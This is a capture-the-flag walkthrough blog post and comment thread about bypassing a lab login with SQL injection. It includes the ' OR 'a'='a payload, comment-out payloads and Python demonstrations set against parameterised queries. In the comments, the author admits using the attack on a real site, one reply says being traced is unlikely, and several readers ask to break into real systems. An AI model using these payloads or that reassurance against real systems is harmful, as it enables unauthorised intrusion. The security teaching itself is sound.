HTS Realistic 2: MySQL-Inject the Nazi Party
Chicago American Nazi Party: Racist pigs are organizing an ‘anti-immigrant’ rally in Chicago. Help anti-racist activists take over their website!
In Hack This Site Realistic mission 2, you must seize control of the Nazi website. Knowledge of SQL is required.
From: DestroyFascism
Message: I have been informed that you have quite admirable hacking skills. Well, this racist hate group is using their website to organize a mass gathering of ignorant racist bastards. We cannot allow such bigoted aggression to happen. If you can gain access to their administrator page and post messages to their main page, we would be eternally grateful.
When you first reach the target site, you will see a simple layout with a few image links at the bottom. Don't follow them: they lead to a real Nazi site, which it would be illegal to attack. The first step is always to check the source code. You will find the following interesting part:
<a href="update.php">
<font color="#000000">
update
</font>
</a>
It is a hyperlink, hidden by giving the text the same colour as the background. This is a very simplistic way of hiding an administration page: the link is still in the HTML, so anyone who reads the source, or a search engine crawling the page, will find it. Follow the link to http://www.hackthissite.org/missions/realistic/2/update.php, and you will find an authentication form.
As always, start by viewing the source of the form. Unfortunately, this time there is nothing interesting to find, which tells us that the attack must happen at another level.
We can be pretty sure that there is a PHP script processing the form data, since the form's action attribute is update2.php. PHP with MySQL is a very common way of managing a list of users. Now imagine what the SQL query the PHP script sends to the database might look like:
SELECT * FROM users WHERE username = '$USERNAME' and password = '$PASSWORD'
The SELECT clause determines which columns are fetched from each row, and the asterisk (*) is a wildcard meaning every column. The FROM clause names the table. The WHERE clause is the interesting one: it holds the conditions a row must satisfy to be returned. Here the username must be what we entered, and so must the password. For instance, if we entered "SomeUser" and "SomePass123", the query would be:
SELECT * FROM users WHERE username = 'SomeUser' and password = 'SomePass123'
This is where the injection in SQL injection comes into play. Suppose our username contained a single quote ('). It would close the string early and, on its own, make the query invalid. With that, it is possible to hijack the query completely: we just need a username and a password that satisfy the WHERE clause regardless of what is stored. I used the following as both the username and the password:
' OR 'a'='a
The processed query will then be:
SELECT * FROM users WHERE username = '' OR 'a'='a' and password = '' OR 'a'='a'
So the username/password combination no longer matters. AND binds more tightly than OR, so the database reads the condition as (username = '') OR ('a'='a' AND password = '') OR ('a'='a'); the last alternative is true for every row, so the whole table is returned and the script, which only looks at the first row, logs us in as whichever user comes first. With luck that is the administrator.
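As an added example, not part of the original post: a Python script using the standard sqlite3 module (the error messages quoted in the comments below show that the HTS script itself used SQLite; the quoting rules and AND/OR precedence involved are the same in MySQL). It builds the hypothetical query both ways, by string concatenation as the post assumes and with bound parameters, runs the payload against a constructed two-row users table, and includes the single-quote probe Tim suggests in the comments. The table contents and account names are made up.

```python
import sqlite3

# Constructed sample data (assumption): two accounts, the administrator
# inserted first, as the post hopes is the case on the target site.
SAMPLE_USERS = [("admin", "s3cret-admin"), ("brother", "aryan1")]


def make_db():
    """Build an in-memory users table matching the hypothetical query."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


def build_query(username, password):
    """The vulnerable pattern the post assumes: form fields spliced
    straight into the SQL text, quotes and all."""
    return (f"SELECT * FROM users WHERE username = '{username}' "
            f"and password = '{password}'")


def vulnerable_login(username, password):
    """Return the first matching row, as a PHP script that calls
    mysql_fetch_array() once would, or None when nothing matches."""
    return make_db().execute(build_query(username, password)).fetchone()


def safe_login(username, password):
    """Same check with bound parameters: the driver sends the two values
    separately from the SQL text, so a quote in the input is just data."""
    return make_db().execute(
        "SELECT * FROM users WHERE username = ? and password = ?",
        (username, password)).fetchone()


def quote_probe(username):
    """Tim's detection check: True when a lone apostrophe in the field
    makes the query syntactically invalid, the tell-tale sign that the
    input reaches the SQL text unescaped."""
    try:
        vulnerable_login(username, "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    payload = "' OR 'a'='a"
    print(build_query(payload, payload))
    print("vulnerable:", vulnerable_login(payload, payload))
    print("parameterised:", safe_login(payload, payload))
    print("probe with a bare quote:", quote_probe("'"))
```

The same script also shows why the variant some commenters used, a real username with the payload only in the password field, works: the trailing OR 'x'='x' still sits outside the AND and makes every row match.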
Unfortunately, few sites protect themselves against this kind of SQL-injection. I once managed to get myself a report to the police when I used it on a small social networking site.

I have heard about this kind of injection before. It's really amazing to see how it happens. I hope all the people know about it and are protecting against it.
Comment by Ashish Mohta — February 7, 2007 @ 3:30 pm
I don’t get it. Can you explain this a little bit better?
Here are the things I don’t get
1.) Where did the "SELECT * FROM users WHERE username = '$USERNAME' and password = '$PASSWORD'" come from?
2.) What is MySQL?
3.) And what is the a=a thing?
plz help me!
Comment by weston — February 10, 2007 @ 4:55 am
weston, I’ll take the questions in a different order:
2) MySQL is a database system that is very commonly used with PHP. The filename extension of the files in this HackThisSite mission is “.php”, thus we can assume that the database used is MySQL. There is no way to know this exactly, but in this mission it happens to work anyway. You really have to know basic MySQL in order to finish this level. The SELECT syntax should be enough.
1) The MySQL statement for fetching a row of data is SELECT. The standard syntax of it is SELECT column FROM table WHERE condition, replacing the bolded parts. The query that you quoted is just a hypothetical query; the column-names and table-name can certainly change. However, this would not affect the SQL injection itself since it is carried out in the conditions. You could try moving the conditions around by yourself and testing that username/password: you will see that it works in almost every case.
3) ' OR 'a'='a is a username and password specifically constructed to crash the query. Since it contains an apostrophe, it ends the string in the condition. After this, it inserts the OR-statement, and begins a new comparison: whether 'a' is equal to 'a' (the last apostrophe is already in the query and thus should not be included). Of course, 'a' is equivalent to 'a'. Thus, every row is fetched from the database, and hopefully the first one has administration-capabilities.
Good luck,
Tim.
Comment by Tim — February 10, 2007 @ 10:57 am
weston
Ok, that was cool. The ' OR 'a'='a thingy, I'm not sure what it meant, until I read the last post..
but your aim here is to crash the query.
what you type in, ' OR 'a'='a will crash the query and select row a column a, and give you that user.
copy paste ' OR 'a'='a into both the user and password for this mission, when you see it works you'll have a better understanding, like I did.
Comment by Stuie — February 14, 2007 @ 10:32 am
Stuie, almost right. It doesn't select "row a column a". Rather, it selects every row where 'a' = 'a'. Since 'a' is always equal to 'a', just like 1=1, every row is selected. Only the first result is used, though, but that doesn't matter.
Glad you completed this level.
Comment by Tim — February 14, 2007 @ 5:04 pm
' OR 'a'='a is a username AND password at the same time (think about it)
Comment by Grhacker — February 22, 2007 @ 4:57 pm
yo i have done this 100 timez and its not working 4 me please help
Comment by Da'Von — February 25, 2007 @ 6:49 pm
Da’Von, try again. It might work better.
Comment by Tim — February 25, 2007 @ 8:42 pm
' OR 'a'='a
Comment by ' OR 'a'='a — February 28, 2007 @ 6:45 am
Sounds good, i shall try
Comment by Joe — February 28, 2007 @ 7:48 am
Yo, i've been trying this and it doesn't work, can some1 just tell me the pass and user name in this fashion?
Username:
Password:
Comment by decrypter — March 3, 2007 @ 3:18 pm
decrypter, dont u no that is wat the site said not 2 do
Comment by Da'Von — March 3, 2007 @ 6:19 pm
am i supposed 2 type 1'=1 or '1'=1'
Comment by Da'Von — March 3, 2007 @ 6:28 pm
but i dont get the pass or the username
Comment by decrypter — March 3, 2007 @ 7:47 pm
Yea i dont either, check all of the basic webs u’ll c my name there asking for help then i mess wit it and i get sumthin,trust dont ask for the answer,and if u need any help look me up at hts my name is the same
Comment by DaVon — March 4, 2007 @ 12:39 am
"Unfortunately, few sites protect themselves against this kind of SQL-injection. I once managed to get myself a report to the police when I used it on a small social networking site."
How can you recognize whether it is possible to get in by "' OR 'a'='a"?
Comment by siriuss19 — March 7, 2007 @ 10:32 pm
siriuss19, just try inputting an apostrophe ('). If it returns a MySQL error, it might work.
Comment by Tim — March 8, 2007 @ 6:25 am
On both, username and password? Can I get traced for using that?
Comment by siriuss19 — March 8, 2007 @ 5:14 pm
siriuss19, yes, although the risk is very small that you are found if you don’t cause any damage since the logs certainly are not actively overlooked.
Comment by Tim — March 8, 2007 @ 7:26 pm
ok i followed the link to the page that said "welcome white brother"
now my question is where we put the "SELECT * FROM users WHERE username = '' OR 'a'='a' and password = '' OR 'a'='a'" ?? please help me.
Comment by aspirin111 — March 27, 2007 @ 11:58 am
I am completely lost. Where do I put "SELECT * FROM users WHERE username = '' OR 'a'='a' and password = '' OR 'a'='a'"? I tried putting it in the Username field but it did nothing
I am completely dumb please help me.
Comment by Ratcat — March 28, 2007 @ 5:43 am
aspirin111 and Ratcat: You shouldn't insert the SELECT query anywhere. That query is an example of how it might look in the verification script. Use the following as both username and password:
' OR 'a'='a
Note that you should use single apostrophes, not the accents here.
Comment by Tim — March 28, 2007 @ 4:58 pm
putting the note definitely helped since i tried it with the accents like 20 times
Comment by hakk3d — March 30, 2007 @ 7:15 pm
WHOP NEVER MIND I JUST DID IT AND FINISHED IT THANK YOU SO SO SO MUCH!!!!!!!!!!!!!!!!!!!!!!!!
Comment by aspirin111 — April 12, 2007 @ 4:00 pm
i still don't get it.. i typed this in both the user name and password field but still didn't get in..
' OR 'a'='a
any help please? thanks.
Comment by snugg — April 15, 2007 @ 4:54 am
I have no idea. I put ' OR 'a'='a as both the user and pass but I still get this
Invalid username/password. Get the fuck out.
Could somebody either tell me the user and pass I should put in or tell me step by step what to do
Comment by Arrow919 — April 15, 2007 @ 3:58 pm
i figured it out. in tim's post, he used the ` sign (that's the one beside the number 1 key and above the tab) however you need to use the ' key (the one beside enter).
so it is
' OR 'a'='a
and you get through.
Comment by snugg — April 15, 2007 @ 6:25 pm
snugg, that’s correct. I’m sorry, but WordPress (the CMS that I use for blogging) automatically replaces the standard single quotes with more fancy ones.
Comment by Tim — April 15, 2007 @ 7:59 pm
username: '
password: ' OR 'a'='a
Comment by An7hrax — May 11, 2007 @ 4:45 pm
i got that SQL Error: near "a": syntax error so now what do i do?
Comment by jean — May 11, 2007 @ 11:47 pm
Jean, check to make sure that you use the correct apostrophes. They’re the ones which you can usually make by pressing a key once.
Comment by Tim — May 13, 2007 @ 4:18 pm
Is their a way to get into website filters like st.bernard (http://10.7.0.110/) and override the password without getting tracked
Comment by Anonymous — May 16, 2007 @ 5:19 pm
Anonymous: Probably, but not any that I know of. Besides, it’s probably illegal, and thus you shouldn’t try.
Comment by Tim — May 16, 2007 @ 7:05 pm
how can you get onto a computer without a password because my brother is a school tech guy and he gets on my computer and changes the password so i can not get on. can you tell me how to do it so i do not have to beg him anymore?
Comment by Anonymous — May 17, 2007 @ 4:04 pm
the website ask for username and password which are stored in the web site mysql database. The mission is to get the administrator username and password from the web site .
this is similar to above post.
can you help me how to achieve this.
thanks
Comment by Anonymous — May 19, 2007 @ 10:13 am
Anonymous: The best solution is to tell your mom to make him stop.
Comment by Tim — May 20, 2007 @ 3:56 pm
I got
Invalid username/password. Get the **** out.
SQL Error: near "a": syntax error
.
Comment by Ian — May 29, 2007 @ 8:06 pm
Ian, remember to change the apostrophes to “real” apostrophes, like those used for strings in most programming languages. Those in the original post here are a bit too “fancy”.
Comment by Tim — May 30, 2007 @ 6:51 pm
my solution was: do not copy and paste, try to type it
it works
Comment by my solution was do not copy and paste try to type it it works — June 4, 2007 @ 6:30 am
this is how you enter it
username: ' OR 'a'='a
password: ' OR 'a'='a
type/copy&paste the above in to the relevant boxes and submit
Comment by jigsaw128 — June 5, 2007 @ 12:56 pm
Uhhh… Hypothetically speaking, what if we didn't know it was a link to a real website and commenced an attack unaware of the dangers it held in its white hands… we got to the server but were blocked because of an invalid username. I then cheated on the mission and came here looking for answers… I found the truth.
Comment by King of the Hearts — June 6, 2007 @ 4:47 am
That was easy, I did it a bit differently than you wrote. I easily found the update.php, then, as a username put admin and as password "anything' OR 'x'='x". It's similar to your example; hope you'll do guides for missions 4, 5 and etc. because I believe they will be harder than this one, which I passed with ease.
Comment by IAmMe — June 14, 2007 @ 10:52 am
It keeps saying:
Invalid username/password. Get the fuck out.
SQL Error: near "a": syntax error
WTF@!!
Comment by Kalyb — June 16, 2007 @ 2:35 am
Okay I think what I mean to ask is, how do I change to real apostrophes
Comment by Kalyb — June 16, 2007 @ 2:59 am
Kalyb, just write it by yourself instead of copying. It’s the ones usually used in coding, also called single quotes.
Comment by Tim — June 16, 2007 @ 3:04 pm
look, i'm VEEEEEEERY noob and .. sorry for making such a newbie question but, where do i put the SQL injection function?! :x
Comment by Basquie — June 19, 2007 @ 1:35 pm
ouh! i found out where to put that kind of information, but now, it gives me an error ..
SQL Error: near "fireyourboss": syntax error
what does that mean?
Comment by Basquie — June 19, 2007 @ 1:39 pm
Basquie: That’s weird. Are you sure that you substituted the apostrophes with real ones?
Comment by Tim — June 20, 2007 @ 7:04 pm
Tim,
Main question: Why is it that ' OR 'a' = 'a works exactly?
Is there a reason that the first a has ' on both sides whereas the second a only has ' before it? i.e. 'a' as opposed to 'a
thanks
Comment by plop — June 25, 2007 @ 6:27 am
Plop: That string interferes with the original MySQL query, altering it. The result is that you are allowed access if the password is correct OR if ‘a’ is equal to ‘a’, which is always true. Read the post carefully for a more thorough explanation.
Comment by Tim — June 26, 2007 @ 12:35 pm
I've done this ' OR 'a'='a like a million times, and it never does anything. The same thing happened to me in the first realistic mission; I put what these things tell you to put, but they never work.
does anyone know what i am doing wrong?
Comment by kinger — July 14, 2007 @ 7:23 pm
kinger, sure you're putting it both as the username and as the password?
Comment by Tim — July 15, 2007 @ 10:05 am
will this work for orkut or hotmail or any other site, sir??
Comment by Interested — July 27, 2007 @ 5:41 pm
Interested: No. This relies on a specific vulnerability. Furthermore, if it did, doing so would be illegal.
Comment by Tim — July 27, 2007 @ 11:29 pm
I keep getting “Fatal error: Call to undefined function sqlite_open() in /var/www/sites/scenestar/rootthisbox.net/subdomains/www/html/missions/realistic/2/update2.php on line 5″
I know I'm typing it in right. Maybe the server is messed up right now?
Comment by inzel — July 28, 2007 @ 11:08 am
inzel: It’s probably a HTS problem; wait a while and it should work again.
Comment by Tim — July 30, 2007 @ 1:52 pm
to anyone that gets the SQL Error: near "a": syntax error:
try putting the injection in the password field instead of username field, that worked for me
Comment by gycogeco — August 1, 2007 @ 2:22 pm
If you actually have half a brain, they wrote the answer 1000x times. And he also explained that a character is changed automatically by his blog. Read all the comments and you have your answer.
Comment by cel0x — August 16, 2007 @ 9:21 am
how do we NOT get traced using mysql injection? is it possible?
Comment by wonderin — August 21, 2007 @ 10:44 am
here is what you do, you put
' OR 'a'='a
as both user name and password then hit update
Comment by Ryanb58 — August 26, 2007 @ 2:45 pm
worked on HTS but i went on and tried ' OR 'a'='a on a dozen other pages, didn't work, i'm pissed :(
Comment by G-MAN — August 29, 2007 @ 6:54 pm
how do i inject them?
Comment by daniel — September 23, 2007 @ 10:24 am
so simple my friend . . .
' OR 'a'='a
both to username and password okey?
help me hack this site
http://www.msumain.edu.ph
come on@
Comment by mastershield — September 28, 2007 @ 5:53 am
for the user name and password slots just enter:
' OR 'a'='a
and it will work
Comment by Anonymous — October 19, 2007 @ 4:13 am
it keeps saying
Invalid username/password. Get the fuck out.
SQL Error: near "a": syntax error
.
Comment by ginger — October 19, 2007 @ 5:17 pm
Yep true, it's not with ' OR 'a'='a anymore. stop spoiling that web plz.
Comment by Azs — November 8, 2007 @ 4:44 pm
so u have to write
username= 'OR 'a'='a
password 'OR'a'='a
so at username u leave a blank space between ' and OR and '
but in the password u write it without any space between it
Comment by noro — November 13, 2007 @ 6:47 pm
I know sql and I wrote the code out i even tried the like clause
i get this error
Invalid username/password. Get the **** out.
SQL Error:
.
these is my codes
Select * from users where username = 'a' OR ' ' and password = 'a' or ''
Select * from users where username like 'a%' or username like 'adm%' and password like ' '
Comment by wayko — January 16, 2008 @ 5:28 pm
I have a question.. How do I hack if the password is encrypted and the query looks like this.. $query = "SELECT * FROM users WHERE users = '" . $_POST['username'] . "' AND Password = PASSWORD('" . $_POST['password'] . "')"; // Jas
Comment by Jas — February 4, 2008 @ 3:07 pm
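Jas's question above concerns a query in which the password side is wrapped in MySQL's PASSWORD() function. As an added example, not part of the original thread: a Python/sqlite3 script with a constructed users table and a SHA-1 stand-in registered under the name PASSWORD (assumption: any one-way hash behaves the same for this purpose). It shows that the ' OR 'a'='a pair from the post no longer gets in, because the stored hash now has to match, while closing the username string and commenting out the rest of the statement does. The account names and passwords are made up.

```python
import hashlib
import sqlite3


def pw_hash(value):
    """Stand-in for MySQL's PASSWORD(): a one-way hash of the text.
    str() is applied because SQLite passes an integer when the argument
    is an injected boolean expression rather than a string."""
    return hashlib.sha1(str(value).encode()).hexdigest()


def make_db():
    """Constructed sample table using Jas's column names; only hashes
    are stored, never the clear-text passwords."""
    db = sqlite3.connect(":memory:")
    db.create_function("PASSWORD", 1, pw_hash)
    db.execute("CREATE TABLE users (users TEXT, Password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", pw_hash("s3cret")), ("guest", pw_hash("guest"))])
    return db


def build_query(username, password):
    """Jas's query shape: both fields concatenated in, the password
    hashed inside the SQL statement."""
    return (f"SELECT * FROM users WHERE users = '{username}' "
            f"AND Password = PASSWORD('{password}')")


def login(username, password):
    """First matching row, or None when nothing matches."""
    return make_db().execute(build_query(username, password)).fetchone()


# Payloads. The tautology alone fails here: the password part becomes
# PASSWORD('' OR 'a'='a'), a hash of the value 1, which matches nothing,
# and the username part is still ANDed with that failed check.
TAUTOLOGY = "' OR 'a'='a"
# The comment marker '-- ' (with the trailing space MySQL requires)
# discards everything after it, including the PASSWORD() check.
COMMENT_OUT = "' OR 'a'='a' -- "
TARGETED = "admin' -- "

if __name__ == "__main__":
    for user, pw in [(TAUTOLOGY, TAUTOLOGY), (COMMENT_OUT, "x"), (TARGETED, "x")]:
        print(build_query(user, pw))
        print("  ->", login(user, pw))
```

Note that the injection now has to go into the username field; nothing typed into the password field can help, since it is hashed before being compared.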
this took me a while to find out but after you try a password and it fails, u need to refresh the page… then copy the line from post 62
Comment by Razedd — March 9, 2008 @ 1:59 pm
So say that I’m using TOR with all the additional safety checks done.
I am trying to find a single site out there that has this vulnerability. I have yet to find one..
Any hints as to what to look for to find such a site?
I am a server admin and have made PHP sites and I haven't had to do a thing to prevent this vulnerability and yet it doesn't work on my sites.
I’m mainly just curious as to what it looks like when it works, and I want to know more about it so I can further protect my sites if i need to.
Cheers,
Comment by GregTRONlives — March 18, 2008 @ 11:59 pm
so if its that easy how the hell do u do the realistic 4 with the fisherman
plz…email me tnxs
Comment by Y — March 28, 2008 @ 11:41 pm
in the password and name field how would u work this following piece of code out Login
Comment by barson666 — March 29, 2008 @ 10:35 pm
“Login
” how would u work out this code??
Comment by barson666 — March 29, 2008 @ 10:38 pm
<a href="/top/edit.php?name=$(name)&pass=$(pass)&action=panel">Login</a>
Comment by barson666 — March 29, 2008 @ 10:40 pm
i keep getting
Invalid username/password. Get the fuck out.
SQL Error:
.
Comment by fecility — April 19, 2008 @ 8:18 pm
alert ('s')
Comment by alert ('s') — April 21, 2008 @ 6:27 pm
FOLLOW THIS
REFRESH YOUR PAGE
THEN COPY FROM POST 62
PASTE BOTH AT USERNAME AND PASSWORD
VOILA
if u want any help, mail sinister1228@yahoo.com
Comment by nazee1228 — May 3, 2008 @ 12:15 pm
all i get is this:
Invalid username/password. Get the fuck out. SQL Error: .
where do i go from here??? did i mess up or did i miss a step along the way???
Comment by lamb199 — June 30, 2008 @ 10:28 pm
I clicked the link to the site :D But did not hack :(
Comment by Ronan — July 19, 2008 @ 1:04 pm